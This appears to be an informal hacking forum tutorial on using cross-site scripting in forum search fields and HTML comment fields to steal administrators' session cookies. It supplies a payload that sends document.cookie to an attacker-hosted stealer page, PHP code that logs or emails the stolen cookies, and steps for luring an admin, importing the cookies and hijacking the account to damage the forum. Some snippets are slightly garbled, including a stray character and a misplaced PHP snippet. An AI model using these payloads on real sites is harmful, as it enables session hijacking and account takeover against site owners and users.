XSS can be used in 2 conditions.
Sometimes there are forums that have particular fields that allow HTML posts..
Or a vulnerability in the search field.

A vulnerable search field that allows html searches and uses $_GET function instead of $_POST
Okay so.. lets talk about the Search field first. its easier lol

Testing Vulnerability
write in the search bar : <script>alert("XSS")</script>
Now an alert message should show XSS
If it didnt. than the search field is unexploitable.

Now to get a link that would redirect to your cookie stealer put this in the search :

<script language="Javascript">
1document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>
and send the link to the admin as a PM ..

Cookie stealer code :

$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
upload this to your host. than replace the link in the first javascript. Now pm the admin or anyuser u wanna hack.

As soon as the admin opens the link. the cookie should be saved in a text file on ur host...

Now download firefox and Cookie editor add-on. ( I'm too lazy to post links )

Put the cookies in the cookie editor and go to the website you should be logged on as admin ( If his session didnt end yet )

Now F**K that forum up !

Exploiting posts

You can exploit posts such as posting a comment on the admins profile ( wich allows html posts 99% of the time )

Post this

$cookie = $HTTP_GET_VARS["cookie"];
mail("me**mydomain.com", "Cookie stealer report", $cookie);
Change the me**mydomain.com to your email. the cookies should be mailed to you.

Now as usual. add the cookies using your ***y cookie editor and than go to the website. If your lucky enough his session would not have expired yet..